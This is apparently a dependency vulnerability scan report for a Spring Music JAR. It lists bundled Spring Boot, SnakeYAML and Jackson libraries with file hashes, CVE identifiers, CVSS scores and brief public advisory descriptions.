CVE-2017-18640 suppress
The Alias feature in SnakeYAML before 1.26 allows entity expansion during a load operation, a related issue to CVE-2003-1564. CWE-776 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
OSSINDEX - [CVE-2017-18640] CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-18640 OSSIndex - https://bitbucket.org/asomov/snakeyaml/issues/377/allow-configuration-for-preventing-billion af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - RELEASE_NOTES,THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY cve@mitre.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2022-25857 suppress
The package org.yaml:snakeyaml from 0 and before 1.31 are vulnerable to Denial of Service (DoS) due missing to nested depth limitation for collections. CWE-776 Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
OSSINDEX - [CVE-2022-25857] CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion') OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-25857 OSSIndex - https://bitbucket.org/snakeyaml/snakeyaml/issues/525 af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY report@snyk.io - EXPLOIT,PATCH,THIRD_PARTY_ADVISORY report@snyk.io - MAILING_LIST,THIRD_PARTY_ADVISORY report@snyk.io - PATCH,THIRD_PARTY_ADVISORY report@snyk.io - PATCH,THIRD_PARTY_ADVISORY Vulnerable Software & Versions:
CVE-2022-38749 suppress
Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. CWE-787 Out-of-bounds Write, CWE-121 Stack-based Buffer Overflow
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2022-38751 suppress
Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. CWE-787 Out-of-bounds Write, CWE-121 Stack-based Buffer Overflow
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2022-38752 suppress
Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack-overflow. CWE-787 Out-of-bounds Write, CWE-121 Stack-based Buffer Overflow
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2022-41854 suppress
Those using Snakeyaml to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow. This effect may support a denial of service attack. CWE-787 Out-of-bounds Write, CWE-121 Stack-based Buffer Overflow
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2022-38750 suppress
Using snakeYAML to parse untrusted YAML files may be vulnerable to Denial of Service attacks (DOS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stackoverflow. CWE-787 Out-of-bounds Write, CWE-121 Stack-based Buffer Overflow
CVSSv3:
Base Score: MEDIUM (5.5) Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:1.8/RC:R/MAV:A References:
OSSINDEX - [CVE-2022-38750] CWE-121: Stack-based Buffer Overflow OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-38750 OSSIndex - https://bitbucket.org/snakeyaml/snakeyaml/issues/526/stackoverflow-oss-fuzz-47027 OSSIndex - https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=47027 af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY cve-coordination@google.com - EXPLOIT,ISSUE_TRACKING,MAILING_LIST,THIRD_PARTY_ADVISORY cve-coordination@google.com - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve-coordination@google.com - MAILING_LIST,THIRD_PARTY_ADVISORY Vulnerable Software & Versions:
spring-music-sqldb-1.0.jar: spring-boot-2.0.1.RELEASE.jarDescription:
Spring Boot License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0 File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-boot-2.0.1.RELEASE.jar
MD5: dc0f62283e9bfd0a0b3f7a7f4a8503af
SHA1: b8c5b14cbb0e52fdded8f98a8c1493cc74c7cf59
SHA256: 31dfbf9b801dbb428e128f5983b12b1efec7ceef19f0a8886c21423055e9a485
Evidence Type Source Name Value Confidence Vendor central artifactid spring-boot Highest Vendor central groupid org.springframework.boot Highest Vendor file name spring-boot High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor jar package name boot Highest Vendor jar package name boot Low Vendor jar package name springframework Low Vendor Manifest automatic-module-name spring.boot Medium Vendor pom artifactid spring-boot Low Vendor pom developer email info@pivotal.io Low Vendor pom developer name Pivotal Medium Vendor pom developer org Pivotal Software, Inc. Medium Vendor pom developer org URL http://www.spring.io Medium Vendor pom groupid org.springframework.boot Highest Vendor pom name Spring Boot High Vendor pom organization name Pivotal Software, Inc. High Vendor pom organization url https://spring.io Medium Vendor pom parent-artifactid spring-boot-parent Low Vendor pom url https://projects.spring.io/spring-boot/#/spring-boot-parent/spring-boot Highest Product central artifactid spring-boot Highest Product file name spring-boot High Product jar package name boot Highest Product jar package name boot Low Product Manifest automatic-module-name spring.boot Medium Product Manifest Implementation-Title Spring Boot High Product pom artifactid spring-boot Highest Product pom developer email info@pivotal.io Low Product pom developer name Pivotal Low Product pom developer org Pivotal Software, Inc. Low Product pom developer org URL http://www.spring.io Low Product pom groupid org.springframework.boot Highest Product pom name Spring Boot High Product pom organization name Pivotal Software, Inc. Low Product pom organization url https://spring.io Low Product pom parent-artifactid spring-boot-parent Medium Product pom url https://projects.spring.io/spring-boot/#/spring-boot-parent/spring-boot Medium Version central version 2.0.1.RELEASE Highest Version Manifest Implementation-Version 2.0.1.RELEASE High Version pom version 2.0.1.RELEASE Highest
Related Dependencies spring-music-sqldb-1.0.jar: spring-boot-autoconfigure-2.0.1.RELEASE.jar spring-music-sqldb-1.0.jar: spring-boot-starter-2.0.1.RELEASE.jarFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-boot-starter-2.0.1.RELEASE.jar MD5: d1c30fdc178e996b300f44846e40d032 SHA1: 33abc1286b0aabea4f08ff4285d09e587835a716 SHA256: aefb7c105f0806dddea33391bbe841aa979a3d8f34cd9ad6d83f266b2182f347 pkg:maven/org.springframework.boot/spring-boot-starter@2.0.1.RELEASE spring-music-sqldb-1.0.jar: spring-boot-starter-actuator-2.0.1.RELEASE.jar spring-music-sqldb-1.0.jar: spring-boot-starter-aop-2.0.1.RELEASE.jar spring-music-sqldb-1.0.jar: spring-boot-starter-data-jpa-2.0.1.RELEASE.jar spring-music-sqldb-1.0.jar: spring-boot-starter-data-mongodb-2.0.1.RELEASE.jar spring-music-sqldb-1.0.jar: spring-boot-starter-data-redis-2.0.1.RELEASE.jar spring-music-sqldb-1.0.jar: spring-boot-starter-jdbc-2.0.1.RELEASE.jar spring-music-sqldb-1.0.jar: spring-boot-starter-json-2.0.1.RELEASE.jar spring-music-sqldb-1.0.jar: spring-boot-starter-logging-2.0.1.RELEASE.jar spring-music-sqldb-1.0.jar: spring-boot-starter-tomcat-2.0.1.RELEASE.jar CVE-2023-20873 suppress
In Spring Boot versions 3.0.0 - 3.0.5, 2.7.0 - 2.7.10, and older unsupported versions, an application that is deployed to Cloud Foundry could be susceptible to a security bypass. Users of affected versions should apply the following mitigation: 3.0.x users should upgrade to 3.0.6+. 2.7.x users should upgrade to 2.7.11+. Users of older, unsupported versions should upgrade to 3.0.6+ or 2.7.11+. NVD-CWE-noinfo
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2022-27772 suppress
spring-boot versions prior to version v2.2.11.RELEASE was vulnerable to temporary directory hijacking. This vulnerability impacted the org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method. NOTE: This vulnerability only affects products and/or versions that are no longer supported by the maintainer CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: HIGH (7.8) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.6) Vector: /AV:L/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions:
CVE-2023-20883 suppress
In Spring Boot versions 3.0.0 - 3.0.6, 2.7.0 - 2.7.11, 2.6.0 - 2.6.14, 2.5.0 - 2.5.14 and older unsupported versions, there is potential for a denial-of-service (DoS) attack if Spring MVC is used together with a reverse proxy cache. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: spring-boot-actuator-2.0.1.RELEASE.jarDescription:
Spring Boot Actuator License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0 File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-boot-actuator-2.0.1.RELEASE.jar
MD5: 271399ae372b316fe8f570ef292c8b8c
SHA1: aab310ca611fbdb3fe0f74f3f8644ee012abac8d
SHA256: a949f0f49820bbfe58ac2ddb987397ccc281f878e914321658de98d44ddc3007
Evidence Type Source Name Value Confidence Vendor central artifactid spring-boot-actuator Highest Vendor central groupid org.springframework.boot Highest Vendor file name spring-boot-actuator High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor jar package name actuate Low Vendor jar package name boot Highest Vendor jar package name boot Low Vendor jar package name springframework Low Vendor Manifest automatic-module-name spring.boot.actuator Medium Vendor pom artifactid spring-boot-actuator Low Vendor pom developer email info@pivotal.io Low Vendor pom developer name Pivotal Medium Vendor pom developer org Pivotal Software, Inc. Medium Vendor pom developer org URL http://www.spring.io Medium Vendor pom groupid org.springframework.boot Highest Vendor pom name Spring Boot Actuator High Vendor pom organization name Pivotal Software, Inc. High Vendor pom organization url https://spring.io Medium Vendor pom parent-artifactid spring-boot-parent Low Vendor pom url https://projects.spring.io/spring-boot/#/spring-boot-parent/spring-boot-actuator Highest Product central artifactid spring-boot-actuator Highest Product file name spring-boot-actuator High Product jar package name actuate Low Product jar package name boot Highest Product jar package name boot Low Product Manifest automatic-module-name spring.boot.actuator Medium Product Manifest Implementation-Title Spring Boot Actuator High Product pom artifactid spring-boot-actuator Highest Product pom developer email info@pivotal.io Low Product pom developer name Pivotal Low Product pom developer org Pivotal Software, Inc. Low Product pom developer org URL http://www.spring.io Low Product pom groupid org.springframework.boot Highest Product pom name Spring Boot Actuator High Product pom organization name Pivotal Software, Inc. Low Product pom organization url https://spring.io Low Product pom parent-artifactid spring-boot-parent Medium Product pom url https://projects.spring.io/spring-boot/#/spring-boot-parent/spring-boot-actuator Medium Version central version 2.0.1.RELEASE Highest Version Manifest Implementation-Version 2.0.1.RELEASE High Version pom version 2.0.1.RELEASE Highest
CVE-2023-20873 suppress
In Spring Boot versions 3.0.0 - 3.0.5, 2.7.0 - 2.7.10, and older unsupported versions, an application that is deployed to Cloud Foundry could be susceptible to a security bypass. Users of affected versions should apply the following mitigation: 3.0.x users should upgrade to 3.0.6+. 2.7.x users should upgrade to 2.7.11+. Users of older, unsupported versions should upgrade to 3.0.6+ or 2.7.11+. NVD-CWE-noinfo
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2022-27772 suppress
spring-boot versions prior to version v2.2.11.RELEASE was vulnerable to temporary directory hijacking. This vulnerability impacted the org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method. NOTE: This vulnerability only affects products and/or versions that are no longer supported by the maintainer CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: HIGH (7.8) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.6) Vector: /AV:L/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions:
CVE-2023-20883 suppress
In Spring Boot versions 3.0.0 - 3.0.6, 2.7.0 - 2.7.11, 2.6.0 - 2.6.14, 2.5.0 - 2.5.14 and older unsupported versions, there is potential for a denial-of-service (DoS) attack if Spring MVC is used together with a reverse proxy cache. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2023-34055 (OSSINDEX) suppress
In Spring Boot versions 2.7.0 - 2.7.17, 3.0.0-3.0.12 and 3.1.0-3.1.5, it is possible for a user to provide specially crafted HTTP requests that may cause a denial-of-service (DoS) condition.
Specifically, an application is vulnerable when all of the following are true:
* the application uses Spring MVC or Spring WebFlux
* org.springframework.boot:spring-boot-actuator is on the classpath CWE-noinfo
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework.boot:spring-boot-actuator:2.0.1.RELEASE:*:*:*:*:*:*:* spring-music-sqldb-1.0.jar: spring-boot-actuator-autoconfigure-2.0.1.RELEASE.jarDescription:
Spring Boot Actuator AutoConfigure License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0 File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-boot-actuator-autoconfigure-2.0.1.RELEASE.jar
MD5: d30318c5e0970493a5e15bd13604cf6a
SHA1: 794aa7d6b6e05563c69a4684d2f5b7c78e209b0a
SHA256: bfb3c9f00a34f150105d603c31556f3222cef6a7962eb08a93afc5d178e7a3b3
Evidence Type Source Name Value Confidence Vendor central artifactid spring-boot-actuator-autoconfigure Highest Vendor central groupid org.springframework.boot Highest Vendor file name spring-boot-actuator-autoconfigure High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor jar package name actuate Low Vendor jar package name autoconfigure Highest Vendor jar package name boot Highest Vendor jar package name boot Low Vendor jar package name springframework Low Vendor Manifest automatic-module-name spring.boot.actuator.autoconfigure Medium Vendor pom artifactid spring-boot-actuator-autoconfigure Low Vendor pom developer email info@pivotal.io Low Vendor pom developer name Pivotal Medium Vendor pom developer org Pivotal Software, Inc. Medium Vendor pom developer org URL http://www.spring.io Medium Vendor pom groupid org.springframework.boot Highest Vendor pom name Spring Boot Actuator AutoConfigure High Vendor pom organization name Pivotal Software, Inc. High Vendor pom organization url https://spring.io Medium Vendor pom parent-artifactid spring-boot-parent Low Vendor pom url https://projects.spring.io/spring-boot/#/spring-boot-parent/spring-boot-actuator-autoconfigure Highest Product central artifactid spring-boot-actuator-autoconfigure Highest Product file name spring-boot-actuator-autoconfigure High Product jar package name actuate Low Product jar package name autoconfigure Highest Product jar package name autoconfigure Low Product jar package name boot Highest Product jar package name boot Low Product Manifest automatic-module-name spring.boot.actuator.autoconfigure Medium Product Manifest Implementation-Title Spring Boot Actuator AutoConfigure High Product pom artifactid spring-boot-actuator-autoconfigure Highest Product pom developer email info@pivotal.io Low Product pom developer name Pivotal Low Product pom developer org Pivotal Software, Inc. Low Product pom developer org URL http://www.spring.io Low Product pom groupid org.springframework.boot Highest Product pom name Spring Boot Actuator AutoConfigure High Product pom organization name Pivotal Software, Inc. Low Product pom organization url https://spring.io Low Product pom parent-artifactid spring-boot-parent Medium Product pom url https://projects.spring.io/spring-boot/#/spring-boot-parent/spring-boot-actuator-autoconfigure Medium Version central version 2.0.1.RELEASE Highest Version Manifest Implementation-Version 2.0.1.RELEASE High Version pom version 2.0.1.RELEASE Highest
CVE-2023-20873 suppress
In Spring Boot versions 3.0.0 - 3.0.5, 2.7.0 - 2.7.10, and older unsupported versions, an application that is deployed to Cloud Foundry could be susceptible to a security bypass. Users of affected versions should apply the following mitigation: 3.0.x users should upgrade to 3.0.6+. 2.7.x users should upgrade to 2.7.11+. Users of older, unsupported versions should upgrade to 3.0.6+ or 2.7.11+. NVD-CWE-noinfo
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2022-27772 suppress
spring-boot versions prior to version v2.2.11.RELEASE was vulnerable to temporary directory hijacking. This vulnerability impacted the org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method. NOTE: This vulnerability only affects products and/or versions that are no longer supported by the maintainer CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: HIGH (7.8) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.6) Vector: /AV:L/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions:
CVE-2023-20883 suppress
In Spring Boot versions 3.0.0 - 3.0.6, 2.7.0 - 2.7.11, 2.6.0 - 2.6.14, 2.5.0 - 2.5.14 and older unsupported versions, there is potential for a denial-of-service (DoS) attack if Spring MVC is used together with a reverse proxy cache. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2025-22235 (OSSINDEX) suppress
EndpointRequest.to() creates a matcher for null/** if the actuator endpoint, for which the EndpointRequest has been created, is disabled or not exposed.
Your application may be affected by this if all the following conditions are met:
* You use Spring Security
* EndpointRequest.to() has been used in a Spring Security chain configuration
* The endpoint which EndpointRequest references is disabled or not exposed via web
* Your application handles requests to /null and this path needs protection
You are not affected if any of the following is true:
* You don't use Spring Security
* You don't use EndpointRequest.to()
* The endpoint which EndpointRequest.to() refers to is enabled and is exposed
* Your application does not handle requests to /null or this path does not need protection
Sonatype's research suggests that this CVE's details differ from those defined at NVD. See https://ossindex.sonatype.org/vulnerability/CVE-2025-22235 for details CWE-20 Improper Input Validation
CVSSv2:
Base Score: MEDIUM (6.300000190734863) Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N References:
Vulnerable Software & Versions (OSSINDEX):
cpe:2.3:a:org.springframework.boot:spring-boot-actuator-autoconfigure:2.0.1.RELEASE:*:*:*:*:*:*:* spring-music-sqldb-1.0.jar: spring-boot-starter-web-2.0.1.RELEASE.jarDescription:
Starter for building web, including RESTful, applications using Spring
MVC. Uses Tomcat as the default embedded container License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0 File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-boot-starter-web-2.0.1.RELEASE.jar
MD5: 482276ec84e454e3549584bafb755987
SHA1: 88751ed76791d12425ce5a80476baf1749a44cf4
SHA256: 814f0a24d379bca0118c92bb0d6cac34497ab8f79a9bfe62fb46e8dc118ae94c
Evidence Type Source Name Value Confidence Vendor central artifactid spring-boot-starter-web Highest Vendor central groupid org.springframework.boot Highest Vendor file name spring-boot-starter-web High Vendor hint analyzer vendor pivotal software Highest Vendor hint analyzer vendor SpringSource Highest Vendor hint analyzer vendor vmware Highest Vendor Manifest automatic-module-name spring.boot.starter.web Medium Vendor pom artifactid spring-boot-starter-web Low Vendor pom developer email info@pivotal.io Low Vendor pom developer name Pivotal Medium Vendor pom developer org Pivotal Software, Inc. Medium Vendor pom developer org URL http://www.spring.io Medium Vendor pom groupid org.springframework.boot Highest Vendor pom name Spring Boot Web Starter High Vendor pom organization name Pivotal Software, Inc. High Vendor pom organization url https://spring.io Medium Vendor pom parent-artifactid spring-boot-starters Low Vendor pom url https://projects.spring.io/spring-boot/#/spring-boot-parent/spring-boot-starters/spring-boot-starter-web Highest Product central artifactid spring-boot-starter-web Highest Product file name spring-boot-starter-web High Product Manifest automatic-module-name spring.boot.starter.web Medium Product Manifest Implementation-Title Spring Boot Web Starter High Product pom artifactid spring-boot-starter-web Highest Product pom developer email info@pivotal.io Low Product pom developer name Pivotal Low Product pom developer org Pivotal Software, Inc. Low Product pom developer org URL http://www.spring.io Low Product pom groupid org.springframework.boot Highest Product pom name Spring Boot Web Starter High Product pom organization name Pivotal Software, Inc. Low Product pom organization url https://spring.io Low Product pom parent-artifactid spring-boot-starters Medium Product pom url https://projects.spring.io/spring-boot/#/spring-boot-parent/spring-boot-starters/spring-boot-starter-web Medium Version central version 2.0.1.RELEASE Highest Version Manifest Implementation-Version 2.0.1.RELEASE High Version pom version 2.0.1.RELEASE Highest
CVE-2023-20873 suppress
In Spring Boot versions 3.0.0 - 3.0.5, 2.7.0 - 2.7.10, and older unsupported versions, an application that is deployed to Cloud Foundry could be susceptible to a security bypass. Users of affected versions should apply the following mitigation: 3.0.x users should upgrade to 3.0.6+. 2.7.x users should upgrade to 2.7.11+. Users of older, unsupported versions should upgrade to 3.0.6+ or 2.7.11+. NVD-CWE-noinfo
CVSSv3:
Base Score: CRITICAL (9.8) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
CVE-2022-27772 suppress
spring-boot versions prior to version v2.2.11.RELEASE was vulnerable to temporary directory hijacking. This vulnerability impacted the org.springframework.boot.web.server.AbstractConfigurableWebServerFactory.createTempDir method. NOTE: This vulnerability only affects products and/or versions that are no longer supported by the maintainer CWE-668 Exposure of Resource to Wrong Sphere
CVSSv3:
Base Score: HIGH (7.8) Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:1.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.6) Vector: /AV:L/AC:L/Au:N/C:P/I:P/A:P References:
Vulnerable Software & Versions:
CVE-2023-20883 suppress
In Spring Boot versions 3.0.0 - 3.0.6, 2.7.0 - 2.7.11, 2.6.0 - 2.6.14, 2.5.0 - 2.5.14 and older unsupported versions, there is potential for a denial-of-service (DoS) attack if Spring MVC is used together with a reverse proxy cache. CWE-400 Uncontrolled Resource Consumption
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: spring-cloud-cloudfoundry-connector-2.0.1.RELEASE.jar (shaded: com.fasterxml.jackson.core:jackson-annotations:2.3.0)Description:
Core annotations used for value types, used by Jackson data binding package.
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-cloud-cloudfoundry-connector-2.0.1.RELEASE.jar/META-INF/maven/com.fasterxml.jackson.core/jackson-annotations/pom.xmlMD5: 920a7c797babb215595b83388a2cab1aSHA1: bf2a064aec0f86ef110ded6b11147350cfef0bb7SHA256: 4a51ac0c3696f8974d8dde4e6d464e8d03d5a919eb6d365ca6b410e1f6a7cf6c
Evidence Type Source Name Value Confidence Vendor pom artifactid jackson-annotations Low Vendor pom groupid com.fasterxml.jackson.core Highest Vendor pom name Jackson-annotations High Vendor pom parent-artifactid oss-parent Low Vendor pom parent-groupid com.fasterxml Medium Vendor pom url http://wiki.fasterxml.com/JacksonHome Highest Product hint analyzer product java8 Highest Product hint analyzer product modules Highest Product pom artifactid jackson-annotations Highest Product pom groupid com.fasterxml.jackson.core Highest Product pom name Jackson-annotations High Product pom parent-artifactid oss-parent Medium Product pom parent-groupid com.fasterxml Medium Product pom url http://wiki.fasterxml.com/JacksonHome Medium Version pom parent-version 2.3.0 Low Version pom version 2.3.0 Highest
CVE-2018-1000873 suppress
Fasterxml Jackson version Before 2.9.8 contains a CWE-20: Improper Input Validation vulnerability in Jackson-Modules-Java8 that can result in Causes a denial-of-service (DoS). This attack appear to be exploitable via The victim deserializes malicious input, specifically very large values in the nanoseconds field of a time value. This vulnerability appears to have been fixed in 2.9.8. CWE-20 Improper Input Validation
CVSSv3:
Base Score: MEDIUM (6.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H/E:2.8/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P References:
Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: spring-cloud-cloudfoundry-connector-2.0.1.RELEASE.jar (shaded: com.fasterxml.jackson.core:jackson-core:2.3.3)Description:
Core Jackson abstractions, basic JSON streaming API implementation
File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/spring-cloud-cloudfoundry-connector-2.0.1.RELEASE.jar/META-INF/maven/com.fasterxml.jackson.core/jackson-core/pom.xmlMD5: 57bca813b5307e3154e7d8eeddb5c156SHA1: fc05676963f49f5c338cdc115b4ff74dfe041c4fSHA256: e8135af60a414a92b4d8d647e0487d1d728d74987fd65b4c33fce7fe09052488
Evidence Type Source Name Value Confidence Vendor pom artifactid jackson-core Low Vendor pom groupid com.fasterxml.jackson.core Highest Vendor pom name Jackson-core High Vendor pom parent-artifactid oss-parent Low Vendor pom parent-groupid com.fasterxml Medium Vendor pom url http://wiki.fasterxml.com/JacksonHome Highest Product hint analyzer product java8 Highest Product hint analyzer product modules Highest Product pom artifactid jackson-core Highest Product pom groupid com.fasterxml.jackson.core Highest Product pom name Jackson-core High Product pom parent-artifactid oss-parent Medium Product pom parent-groupid com.fasterxml Medium Product pom url http://wiki.fasterxml.com/JacksonHome Medium Version pom parent-version 2.3.3 Low Version pom version 2.3.3 Highest
CVE-2018-1000873 suppress
Fasterxml Jackson version Before 2.9.8 contains a CWE-20: Improper Input Validation vulnerability in Jackson-Modules-Java8 that can result in Causes a denial-of-service (DoS). This attack appear to be exploitable via The victim deserializes malicious input, specifically very large values in the nanoseconds field of a time value. This vulnerability appears to have been fixed in 2.9.8. CWE-20 Improper Input Validation
CVSSv3:
